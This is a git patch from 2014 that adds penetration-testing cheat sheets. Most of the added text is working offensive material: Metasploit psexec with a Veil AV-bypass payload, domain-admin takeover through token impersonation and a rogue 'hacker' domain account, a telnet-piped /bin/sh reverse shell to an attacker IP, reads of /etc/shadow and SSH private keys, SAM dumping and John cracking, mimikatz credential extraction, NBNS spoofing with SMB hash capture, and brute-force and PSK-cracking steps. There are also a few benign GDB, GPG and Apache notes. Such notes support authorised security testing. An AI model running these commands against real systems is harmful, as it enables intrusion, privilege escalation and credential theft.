From 95f035054b42545854904a28914d053ee373c56c Mon Sep 17 00:00:00 2001 From: JShaw Date: Thu, 11 Sep 2014 20:21:13 +0100 Subject: [PATCH] Cheatsheets Added more cheatsheets --- Cheatsheet_AVBypass.txt | 14 + Cheatsheet_ApacheSSL.txt | 42 ++ Cheatsheet_CookieStealing.txt | 12 + Cheatsheet_DomainAdminExploitation.txt | 30 ++ Cheatsheet_GDB.txt | 58 +++ Cheatsheet_GPG.txt | 14 + Cheatsheet_HTTPBasicAuth.txt | 40 ++ Cheatsheet_IKEScan_.txt | 60 +++ Cheatsheet_LinuxPrivilegeEsc.txt | 381 ++++++++++++++++++ Cheatsheet_LocalSamDump.txt | 18 + Cheatsheet_MSFPostExploitation.txt | 26 ++ Cheatsheet_MobileAppTesting.txt | 61 +++ PTCheatsheet.txt => Cheatsheet_PenTesting.txt | 16 +- Cheatsheet_SMBCapture.txt | 57 +++ Cheatsheet_SMBEnumeration.txt | 35 ++ Cheatsheet_SMTPOpenRelay.txt | 8 + Cheatsheet_SQLInjection.txt | 20 + Cheatsheet_SSLStrip.txt | 10 + Cheatsheet_WirelessTesting.txt | 66 +++ 19 files changed, 953 insertions(+), 15 deletions(-) create mode 100644 Cheatsheet_AVBypass.txt create mode 100644 Cheatsheet_ApacheSSL.txt create mode 100644 Cheatsheet_CookieStealing.txt create mode 100644 Cheatsheet_DomainAdminExploitation.txt create mode 100644 Cheatsheet_GDB.txt create mode 100644 Cheatsheet_GPG.txt create mode 100644 Cheatsheet_HTTPBasicAuth.txt create mode 100644 Cheatsheet_IKEScan_.txt create mode 100644 Cheatsheet_LinuxPrivilegeEsc.txt create mode 100644 Cheatsheet_LocalSamDump.txt create mode 100644 Cheatsheet_MSFPostExploitation.txt create mode 100644 Cheatsheet_MobileAppTesting.txt rename PTCheatsheet.txt => Cheatsheet_PenTesting.txt (96%) create mode 100644 Cheatsheet_SMBCapture.txt create mode 100644 Cheatsheet_SMBEnumeration.txt create mode 100644 Cheatsheet_SMTPOpenRelay.txt create mode 100644 Cheatsheet_SQLInjection.txt create mode 100644 Cheatsheet_SSLStrip.txt create mode 100644 Cheatsheet_WirelessTesting.txt diff --git a/Cheatsheet_AVBypass.txt b/Cheatsheet_AVBypass.txt new file mode 100644 index 0000000..355e94e --- /dev/null +++ b/Cheatsheet_AVBypass.txt @@ -0,0 +1,14 @@ +1. Generate executable using Veil. + +2. In msfconsole setup psexec with relevant payload (windows/meterpreter/reverse_tcp) + +msf > use exploit/windows/smb/psexec +msf exploit(psexec) > set RHOST 192.168.0.2 +RHOST => 192.168.0.2 +msf exploit(psexec) > set SMBUser user +SMBUser => user +msf exploit(psexec) > set SMBPass pass +SMBPass => pass +msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe +EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe +msf exploit(psexec) > exploit diff --git a/Cheatsheet_ApacheSSL.txt b/Cheatsheet_ApacheSSL.txt new file mode 100644 index 0000000..bf80b37 --- /dev/null +++ b/Cheatsheet_ApacheSSL.txt @@ -0,0 +1,42 @@ +# Enabling Self signed certificates on local website + +1. Install OpenSSL + +2. Run the following command to generate the self signed SSL certificates: + +openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout mysitename.key -out mysitename.crt + +3. You will be prompted to enter your organizational information and a common name. The common name should be the fully qualified domain name for the site you are securing (www.mydomain.com). You can leave the email address, challenge password, and optional company name blank. When the command is finished running, it will create two files: a mysitename.key file and a mysitename.crt self signed certificate file valid for 365 days. + +4. Install the self signed certificate: + +Make a backup copy of /etc/apache2/sites-enabled/000-default and open the original in a text editor. + +Add the lines in bold below. +DocumentRoot /var/www/website +ServerName www.domain.com +SSLEngine on +SSLCertificateFile /etc/ssl/certs/primary.crt +SSLCertificateKeyFile /etc/ssl/certs/private.key +SSLCertificateChainFile /etc/ssl/certs/intermediate.crt + + +Change the names of the files and paths to match your certificate files. Save the changes and exit the text editor. + +5. Enable mod_ssl under apache using the following commands: + +a2enmod ssl +/etc/init.d/apache2 restart + +## Add ServerName localhost + +to /etc/apache2/apache2.conf + + +More information: +https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html +http://www.akadia.com/services/ssh_test_certificate.html +https://www.sslshopper.com/apache-server-ssl-installation-instructions.html +http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server + + diff --git a/Cheatsheet_CookieStealing.txt b/Cheatsheet_CookieStealing.txt new file mode 100644 index 0000000..aa0302c --- /dev/null +++ b/Cheatsheet_CookieStealing.txt @@ -0,0 +1,12 @@ +[+] Cookie Stealing: + +[-] Start Web Service + +python -m SimpleHTTPServer 80 + +[-] Use one of the following XSS payloads: + + + + + diff --git a/Cheatsheet_DomainAdminExploitation.txt b/Cheatsheet_DomainAdminExploitation.txt new file mode 100644 index 0000000..15bf8bf --- /dev/null +++ b/Cheatsheet_DomainAdminExploitation.txt @@ -0,0 +1,30 @@ +[+] After compromising a Windows machine: + +[>] List the domain administrators: +From Shell - net group "Domain Admins" /domain + +[>] Dump the hashes (Metasploit) +msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE + +[>] Find the admins (Metasploit) +spool /tmp/enumdomainusers.txt +msf > use auxiliary/scanner/smb/smb_enumusers_domain +msf > set smbuser Administrator +msf > set smbpass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 +msf > set rhosts 10.10.10.0/24 +msf > set threads 8 +msf > run + +msf> spool off + +[>] Compromise Admin's box +meterpreter > load incognito +meterpreter > list_tokens -u +meterpreter > impersonate_token MYDOM\\adaministrator +meterpreter > getuid +meterpreter > shell + +C:\> whoami +mydom\adaministrator +C:\> net user hacker /add /domain +C:\> net group "Domain Admins" hacker /add /domain diff --git a/Cheatsheet_GDB.txt b/Cheatsheet_GDB.txt new file mode 100644 index 0000000..33731f2 --- /dev/null +++ b/Cheatsheet_GDB.txt @@ -0,0 +1,58 @@ +set disassembly-flavor intel + +$ cat ~/.bash_aliases | grep gdb +alias gdb='gdb -quiet' + +Running gdb +------------------ +$ gdb - run, then use file command to load object +$ gdb -quiet - supress copyright information +$ gdb object - normal debug +$ gdb object core - analyze core dump +$ gdb object pid - attach to running process + +General commands +------------------ +set args - set program arguments +show args - show program arguments +run - run the program +run < file - run with input from file +set follow-exec-mode new/sam - set debugger response to an exec call +set write - set write into executables +set write off - unset write int oexecutables +continue - continue running until break +finish - execute until current stack frame ends +source FILE - read commands from script file +shell [cmd] - run cmd in a shell +display /5i $eip - display expression everytime execution stops +undisplay - undisplay expression number +info functions - list all the functions +info variables - list all the variables +info registers - list most common registers +info all-registers - list all registers +info display - print the list of displayed expressions +backtrace - print backtrace of all stack frames +where - same as backtrace +set disassembly-flavor intel - set disassembly style to intel/att +define hook-[cmd] - actions to execute before command +define hooopost-[cmd] - actions to execute after command +define hook-stop - actions to execute when execution stops + +Breakpoints +------------------ +info breakpoints - list all breakpoints +break [func] - break function name +break *[addr] - break at address +delete [bnum] - delete breakpoint bnum +break if [cond] - break if condition +ignore [bnum] [count] - ignore breakpoint bnum count times +condition [bnum] $eax == 0x22 - add condition for breakpoint 1 +condition [bnum] - delete condition for breakpoint 1 + +Watchpoints +------------------ +info watchpoints - list all the watchpoint +watch variable==value - break when variable equals .. +watch $eax == 0x0000ffaa - break when register equals .. +rwatch *[addr] - break on read memory location +awatch *[addr] - break on read/write memory location \ No newline at end of file diff --git a/Cheatsheet_GPG.txt b/Cheatsheet_GPG.txt new file mode 100644 index 0000000..58bfcf6 --- /dev/null +++ b/Cheatsheet_GPG.txt @@ -0,0 +1,14 @@ +Encrypt +------------ +sudo gpg -e ~/Desktop/file.doc + +This will prompt you to type in the persons name (public key) to encrypt with. + +Decrypt +----------- +sudo gpg -d ~/Desktop/file.doc.pgp > ~/Desktop/file.doc + + +Import other users' public keys by using: + +sudo gpg --import \ No newline at end of file diff --git a/Cheatsheet_HTTPBasicAuth.txt b/Cheatsheet_HTTPBasicAuth.txt new file mode 100644 index 0000000..d649ef2 --- /dev/null +++ b/Cheatsheet_HTTPBasicAuth.txt @@ -0,0 +1,40 @@ +[>] HTTP Basic Authentication Dictionary and Brute-force attacks with Burp Suite + +http://www.dailysecurity.net/2013/03/22/http-basic-authentication-dictionary-and-brute-force-attacks-with-burp-suite/ + +Burp Suite against HTTP Basic authentication + +To implement the attack you need to capture one authentication request with Burp Proxy and send it to Burp Intruder. + +Mark only the Base64 encoded string and click Add button to put the markers around it. + +Dictionary attack + +For the dictionary attack I’m using custom iterator intruder option. It allows you to generate your own custom payload string consisting from several substrings. For every substring you could specify separator which is basically e suffix. The Intruder calls those substrings “positions”. +Following this logic in position 1 we would like to load an username followed by separator semicolumn and then load password for position 2. +Go to Payload tab and select Custom iterator option from Payload type dropdown box. +Burp Suite Custom Iterator +Select position 1 from the Position dropdown box and load your usernames list in List items for position 1 listbox. Put semicolumn in the Separator for position 1 text box. +Position 1 list and separator option +Select position 2 from the Position dropdown box and load your passwords list in List items for position 2 listbox. +Position 2 +After you’ve set your two positions you need to tell the Intruder to encode the payload string using Base64 encoding. Go to Payload processing sections and click Add button. Select Payload encoding option and then Base64. +PayloadProcessin_AddRule_Encode +PayloadProcessingEncode +By default Burp Intruder URL encodes the payload. Base64 strings often contain = symbol. That is why it is a good idea to exclude it from the list of URL characters for encoding. +That’s it. You can start the Intruder attack. + +Bruteforce attack + +The method I’m using for the bruteforce attack is targeting only one username per Intruder attack. +Select Brute forcer from the Payload type dropdown and then set the length of the password and the characterset you would like the Intruder to use while constructing the password strings. +Burp Intruder Brute forcer +In order to specify the username you would like to brute-force you need to set Payload processing rule. Add new rule with Add prefix type and fill up the username followed by semi-column. +Burp Intruder Add Prefix +Add another rule to encode the payload using Base64. And finally remove = from the list of symbols subject of URL encoding. +Burp Sutei Bruteforce Attack Settings +Done! You can start the Intruder attack! + +[>] Automated Security Analyser for ASP.NET Websites + +https://asafaweb.com \ No newline at end of file diff --git a/Cheatsheet_IKEScan_.txt b/Cheatsheet_IKEScan_.txt new file mode 100644 index 0000000..a1bb87d --- /dev/null +++ b/Cheatsheet_IKEScan_.txt @@ -0,0 +1,60 @@ +Aggressive Mode VPN -- IKE-Scan, PSK-Crack + +In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump and start dictionary or brute force attack against this hash to recover the PSK. + +This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. Based on such facts IKE aggressive mode is not very secure. + +It looks like this: + +$ ike-scan 192.168.207.134 +Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) + +192.168.207.134 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797) +Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec). +0 returned handshake; 1 returned notify + +---------------------------------------------------------------------------------------------------------------------------------- + +$ sudo ike-scan -A 192.168.207.134 +Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ikescan/) + +192.168.207.134 Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX(Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.207.134) Nonce(20 bytes) Hash(16 bytes) + +---------------------------------------------------------------------------------------------------------------------------------- + +To save with some output: + +$ sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key + +Once you have you psk file to crack you're stuck with two options psk-crack and cain + +---------------------------------------------------------------------------------------------------------------------------------- + +Brute force: + +$psk-crack -b 5 192-168-207-134key +Running in brute-force cracking mode +Brute force with 36 chars up to length 5 will take up to 60466176 iterations + +no match found for MD5 hash 5c178d[SNIP] +Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec) + +Default is charset is "0123456789abcdefghijklmnopqrstuvwxyz" can be changed with --charset= + +$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key +Running in brute-force cracking modde +Brute force with 63 chars up to length 5 will take up to 992436543 iterations + +---------------------------------------------------------------------------------------------------------------------------------- + +Dictionary attack: + +$psk-crack -d /path/to/dictionary 192-168-207-134key +Running in dictionary cracking mode + +no match found for MD5 hash 5c178d[SNIP] +Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec) + +---------------------------------------------------------------------------------------------------------------------------------- + +References: http://carnal0wnage.attackresearch.com/2011/12/aggressive-mode-vpn-ike-scan-psk-crack.html \ No newline at end of file diff --git a/Cheatsheet_LinuxPrivilegeEsc.txt b/Cheatsheet_LinuxPrivilegeEsc.txt new file mode 100644 index 0000000..162e187 --- /dev/null +++ b/Cheatsheet_LinuxPrivilegeEsc.txt @@ -0,0 +1,381 @@ +Enumeration is the key. +(Linux) privilege escalation is all about: +Collect - Enumeration, more enumeration and some more enumeration. +Process - Sort through data, analyse and prioritisation. +Search - Know what to search for and where to find the exploit code. +Adapt - Customize the exploit, so it fits. Not every exploit work for every system "out of the box". +Try - Get ready for (lots of) trial and error. + +Operating System +What's the distribution type? What version? +cat /etc/issue +cat /etc/*-release + cat /etc/lsb-release + cat /etc/redhat-release + + +What's the Kernel version? Is it 64-bit? +cat /proc/version +uname -a +uname -mrs +rpm -q kernel +dmesg | grep Linux +ls /boot | grep vmlinuz- + + +What can be learnt from the environmental variables? +cat /etc/profile +cat /etc/bashrc +cat ~/.bash_profile +cat ~/.bashrc +cat ~/.bash_logout +env +set + + +Is there a printer? +lpstat -a + + +Applications & Services +What services are running? Which service has which user privilege? +ps aux +ps -ef +top +cat /etc/service + + +Which service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check! +ps aux | grep root +ps -ef | grep root + + +What applications are installed? What version are they? Are they currently running? +ls -alh /usr/bin/ +ls -alh /sbin/ +dpkg -l +rpm -qa +ls -alh /var/cache/apt/archivesO +ls -alh /var/cache/yum/ + + +Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached? +cat /etc/syslog.conf +cat /etc/chttp.conf +cat /etc/lighttpd.conf +cat /etc/cups/cupsd.conf +cat /etc/inetd.conf +cat /etc/apache2/apache2.conf +cat /etc/my.conf +cat /etc/httpd/conf/httpd.conf +cat /opt/lampp/etc/httpd.conf +ls -aRl /etc/ | awk '$1 ~ /^.*r.*/ + + +What jobs are scheduled? +crontab -l +ls -alh /var/spool/cron +ls -al /etc/ | grep cron +ls -al /etc/cron* +cat /etc/cron* +cat /etc/at.allow +cat /etc/at.deny +cat /etc/cron.allow +cat /etc/cron.deny +cat /etc/crontab +cat /etc/anacrontab +cat /var/spool/cron/crontabs/root + +Any plain text usernames and/or passwords? +grep -i user [filename] +grep -i pass [filename] +grep -C 5 "password" [filename] +find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla + + +Communications & Networking +What NIC(s) does the system have? Is it connected to another network? +/sbin/ifconfig -a +cat /etc/network/interfaces +cat /etc/sysconfig/network + + +What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway? +cat /etc/resolv.conf +cat /etc/sysconfig/network +cat /etc/networks +iptables -L +hostname +dnsdomainname + + +What other users & hosts are communicating with the system? +lsof -i +lsof -i :80 +grep 80 /etc/services +netstat -antup +netstat -antpx +netstat -tulpn +chkconfig --list +chkconfig --list | grep 3:on +last +w + + +Whats cached? IP and/or MAC addresses +arp -e +route +/sbin/route -nee + + +Is packet sniffing possible? What can be seen? Listen to live traffic +# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port] +tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21 + + +Have you got a shell? Can you interact with the system? +# http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/ +nc -lvp 4444 # Attacker. Input (Commands) +nc -lvp 4445 # Attacker. Ouput (Results) +telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP! + + +Is port forwarding possible? Redirect and interact with traffic from another view +# rinetd +# http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch + +# fpipe +# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP] +FPipe.exe -l 80 -r 80 -s 80 192.168.1.7 + +# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip] +ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port +ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port + +# mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe +mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay +mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080) +mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080) + + +Is tunnelling possible? Send commands locally, remotely +ssh -D 127.0.0.1:9050 -N [username]@[ip] +proxychains ifconfig + + +Confidential Information & Users +Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what? +id +who +w +last +cat /etc/passwd | cut -d: # List of users +grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users +awk -F: '($3 == "0") {print}' /etc/passwd # List of super users +cat /etc/sudoers +sudo -l + + +What sensitive files can be found? +cat /etc/passwd +cat /etc/group +cat /etc/shadow +ls -alh /var/mail/ + + +Anything "interesting" in the home directorie(s)? If it's possible to access +ls -ahlR /root/ +ls -ahlR /home/ + + +Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords +cat /var/apache2/config.inc +cat /var/lib/mysql/mysql/user.MYD +cat /root/anaconda-ks.cfg + + +What has the user being doing? Is there any password in plain text? What have they been edting? +cat ~/.bash_history +cat ~/.nano_history +cat ~/.atftp_history +cat ~/.mysql_history +cat ~/.php_history + + +What user information can be found? +cat ~/.bashrc +cat ~/.profile +cat /var/mail/root +cat /var/spool/mail/root + + +Can private-key information be found? +cat ~/.ssh/authorized_keys +cat ~/.ssh/identity.pub +cat ~/.ssh/identity +cat ~/.ssh/id_rsa.pub +cat ~/.ssh/id_rsa +cat ~/.ssh/id_dsa.pub +cat ~/.ssh/id_dsa +cat /etc/ssh/ssh_config +cat /etc/ssh/sshd_config +cat /etc/ssh/ssh_host_dsa_key.pub +cat /etc/ssh/ssh_host_dsa_key +cat /etc/ssh/ssh_host_rsa_key.pub +cat /etc/ssh/ssh_host_rsa_key +cat /etc/ssh/ssh_host_key.pub +cat /etc/ssh/ssh_host_key + + +File Systems +Which configuration files can be written in /etc/? Able to reconfigure a service? +ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone +ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner +ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group +ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other + +find /etc/ -readable -type f 2>/dev/null # Anyone +find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone + + +What can be found in /var/ ? +ls -alh /var/log +ls -alh /var/mail +ls -alh /var/spool +ls -alh /var/spool/lpd +ls -alh /var/lib/pgsql +ls -alh /var/lib/mysql +cat /var/lib/dhcp3/dhclient.leases + + +Any settings/files (hidden) on website? Any settings file with database information? +ls -alhR /var/www/ +ls -alhR /srv/www/htdocs/ +ls -alhR /usr/local/www/apache22/data/ +ls -alhR /opt/lampp/htdocs/ +ls -alhR /var/www/html/ + + +Is there anything in the log file(s) (Could help with "Local File Includes"!) +# http://www.thegeekstuff.com/2011/08/linux-var-log-files/ +cat /etc/httpd/logs/access_log +cat /etc/httpd/logs/access.log +cat /etc/httpd/logs/error_log +cat /etc/httpd/logs/error.log +cat /var/log/apache2/access_log +cat /var/log/apache2/access.log +cat /var/log/apache2/error_log +cat /var/log/apache2/error.log +cat /var/log/apache/access_log +cat /var/log/apache/access.log +cat /var/log/auth.log +cat /var/log/chttp.log +cat /var/log/cups/error_log +cat /var/log/dpkg.log +cat /var/log/faillog +cat /var/log/httpd/access_log +cat /var/log/httpd/access.log +cat /var/log/httpd/error_log +cat /var/log/httpd/error.log +cat /var/log/lastlog +cat /var/log/lighttpd/access.log +cat /var/log/lighttpd/error.log +cat /var/log/lighttpd/lighttpd.access.log +cat /var/log/lighttpd/lighttpd.error.log +cat /var/log/messages +cat /var/log/secure +cat /var/log/syslog +cat /var/log/wtmp +cat /var/log/xferlog +cat /var/log/yum.log +cat /var/run/utmp +cat /var/webmin/miniserv.log +cat /var/www/logs/access_log +cat /var/www/logs/access.log +ls -alh /var/lib/dhcp3/ +ls -alh /var/log/postgresql/ +ls -alh /var/log/proftpd/ +ls -alh /var/log/samba/ +# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp + + +If commands are limited, you break out of the "jail" shell? +python -c 'import pty;pty.spawn("/bin/bash")' +echo os.system('/bin/bash') +/bin/sh -i + + +How are file-systems mounted? +mount +df -h + + +Are there any unmounted file-systems? +cat /etc/fstab + + +What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID +find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here +find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it. +find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it. + +find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID +for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search) + +# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied) +find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null + + +Where can written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm +find / -writable -type d 2>/dev/null # world-writeable folders +find / -perm -222 -type d 2>/dev/null # world-writeable folders +find / -perm -o+w -type d 2>/dev/null # world-writeable folders + +find / -perm -o+x -type d 2>/dev/null # world-executable folders + +find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null # world-writeable & executable folders + + +Any "problem" files? Word-writeable, "nobody" files +find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writeable files +find /dir -xdev \( -nouser -o -nogroup \) -print # Noowner files + + +Preparation & Finding Exploit Code +What development tools/languages are installed/supported? +find / -name perl* +find / -name python* +find / -name gcc* +find / -name cc + + +How can files be uploaded? +find / -name wget +find / -name nc* +find / -name netcat* +find / -name tftp* +find / -name ftp + + +Finding exploit code +http://www.exploit-db.com +http://1337day.com +http://www.securiteam.com +http://www.securityfocus.com +http://www.exploitsearch.net +http://metasploit.com/modules/ +http://securityreason.com +http://seclists.org/fulldisclosure/ +http://www.google.com + + +Finding more information regarding the exploit +http://www.cvedetails.com +http://packetstormsecurity.org/files/cve/[CVE] +http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE] +http://www.vulnview.com/cve-details.php?cvename=[CVE] + + +(Quick) "Common" exploits. Warning. Pre-compiled binaries files. Use at your own risk +http://tarantula.by.ru/localroot/ +http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/ diff --git a/Cheatsheet_LocalSamDump.txt b/Cheatsheet_LocalSamDump.txt new file mode 100644 index 0000000..b3ab9c1 --- /dev/null +++ b/Cheatsheet_LocalSamDump.txt @@ -0,0 +1,18 @@ +fdisk -l + +mount -t ntfs /dev/sda1 /mnt + +df -k + +cd /mnt +ls +cd WINDOWS/system32/config + +ls +bkhive system /root/hive.txt +samdump2 SAM /root/hive.txt > /root/hash.txt + +john /root/hash.txt -format=nt2 -users=Administrator +cd /root/.john +ls -l +cat john.pot \ No newline at end of file diff --git a/Cheatsheet_MSFPostExploitation.txt b/Cheatsheet_MSFPostExploitation.txt new file mode 100644 index 0000000..48ab5fd --- /dev/null +++ b/Cheatsheet_MSFPostExploitation.txt @@ -0,0 +1,26 @@ +[+] Meterpreter Shell + +meterpreter > sysinfo + +meterpreter > getuid + +meterpreter > getsystem + +meterpreter > hashdump + +meterpreter > load/use mimikatz + +kerberos Attempt to retrieve kerberos creds +livessp Attempt to retrieve livessp creds +mimikatz_command Run a custom commannd +msv Attempt to retrieve msv creds (hashes) +ssp Attempt to retrieve ssp creds +tspkg Attempt to retrieve tspkg creds +wdigest Attempt to retrieve wdigest creds + +meterpreter > wdigest + +meterpreter > use incognito +meterpreter > list_tokens -u +meterpreter > impersonate_token SERV-2K3\\Administrator +execute -f cmd.exe -i -t \ No newline at end of file diff --git a/Cheatsheet_MobileAppTesting.txt b/Cheatsheet_MobileAppTesting.txt new file mode 100644 index 0000000..2509a65 --- /dev/null +++ b/Cheatsheet_MobileAppTesting.txt @@ -0,0 +1,61 @@ +http://pen-testing.sans.org/blog/pen-testing/2013/12/02/mobile-device-tips-tricks-and-resources + +------------------------------------------ Mobile Application Test Notes (iPhone) + + +Prepping Device and Application: + +[+] Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04 +[+] Enable SSH on iPhone/iPad +[+] Install iFunbox to install the application (http://www.i-funbox.com) +[+] Connect device to lab wireless network +[+] Add web proxy settings - IP address of attacking machine port 8080 +[+] Ensure connection and SSH is working + + +Prepping Burp Suite: + +[+] Open Burp Suite and navigate to Proxy->Options, + [-] Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’. + +[+] Download and install burp certificate (.crt) onto ipad. + +Mobile Application Penetration Testing: + +[+] Browse the following Directory for insecure storage + [-] /private/var/mobile/applications/ + + +Notes: + +[+] Application file type - x.ipa + + +------------------------------------------ Mobile Application Test Notes (Android) + +[+] Create a virtual device: + [-] android avd + +[+] Start the emulator: + [-] emulator –avd testavd + +[+] Install the application: + [-] adb install + +[+] Open Burp Suite and navigate to Proxy->Options, + [-] Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’. + +[+] Start the emulator and proxy: + [-] emulator –avd testavd –http-proxy http://localhost:8080 + +[+] Download and install burp certificate (.crt) onto the emulator using the push shell command. + + +Notes: + +[+] Application file type - x.apk + +Install Certs: http://www.realmb.com/droidCert/ +SQLite Database Browser: http://sourceforge.net/projects/sqlitebrowser/?source=pdlp + +http://www.mcafee.com/uk/resources/white-papers/foundstone/wp-pen-testing-android-apps.pdf \ No newline at end of file diff --git a/PTCheatsheet.txt b/Cheatsheet_PenTesting.txt similarity index 96% rename from PTCheatsheet.txt rename to Cheatsheet_PenTesting.txt index b584463..2d81f29 100644 --- a/PTCheatsheet.txt +++ b/Cheatsheet_PenTesting.txt @@ -159,16 +159,6 @@ put shell.asp shell.txt copy shell.txt shell.asp;.txt Start reverse handler - browse to http://192.168.0.60/shell.asp;.txt --------------------------------------------------------------------------- Web Applications - - --------------------------------------------------------------------------- Remote Maintenance Services - -Metasploit Auxiliarys - --------------------------------------------------------------------------- Database Services - -Metasploit Auxiliarys -------------------------------------------------------------------------- Windows Networking Services @@ -253,9 +243,6 @@ usermod -R root user [+] Dump remote SAM: PwDump.exe -u localadmin 192.168.0.1 -[+] Cracking Cached Domain/AD Passwords -Irongeek - Cachecrack - [+] Mimikatz mimikatz # privilege::debug mimikatz # sekurlsa::logonPasswords full @@ -347,7 +334,6 @@ set AutoRunScript "migrate explorer.exe" [+] Set up SOCKS proxy in MSF - [+] Run a post module against all sessions resource /usr/share/metasploit-framework/scripts/resource/run_all_post.rc @@ -377,7 +363,7 @@ show evasion [+] Metasploit Shellcode msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' --------------------------------------------------------------------------- Services +-------------------------------------------------------------------------- File Transfer Services [+] Start TFTPD Server atftpd --daemon --port 69 /tmp diff --git a/Cheatsheet_SMBCapture.txt b/Cheatsheet_SMBCapture.txt new file mode 100644 index 0000000..7a79977 --- /dev/null +++ b/Cheatsheet_SMBCapture.txt @@ -0,0 +1,57 @@ +[+] NBNS Spoof / Capture + +[>] NBNS Spoof +msf > use auxiliary/spoof/nbns/nbns_response +msf auxiliary(nbns_response) > show options +msf auxiliary(nbns_response) > set INTERFACE eth0 +msf auxiliary(nbns_response) > set SPOOFIP 10.10.10.10 +msf auxiliary(nbns_response) > run + +[>] SMB Capture + +msf > use auxiliary/server/capture/smb +msf auxiliary(smb) > set JOHNPWFILE /tmp/john_smb +msf auxiliary(smb) > run + +[>] HTTP NTML Capture + +msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm +msf auxiliary(smb) > set JOHNPWFILE /tmp/john_http +msf auxiliary(smb) > set SRVPORT 80 +msf auxiliary(smb) > set URIPATH / +msf auxiliary(smb) > run + + +Fix: +http://www.leonteale.co.uk/netbios-nbns-spoofing/ + +Solution +The solution to this is to disable Netbios from broadcasting. The setting for this is in, what i hope, a very familiar place thaet you might not have really paid attention too before. +netbios + +Netbios, according to Microsoft, is no longer needed as of Windows 2000. +However, there are a few side effects. +One of the unexpected consequences 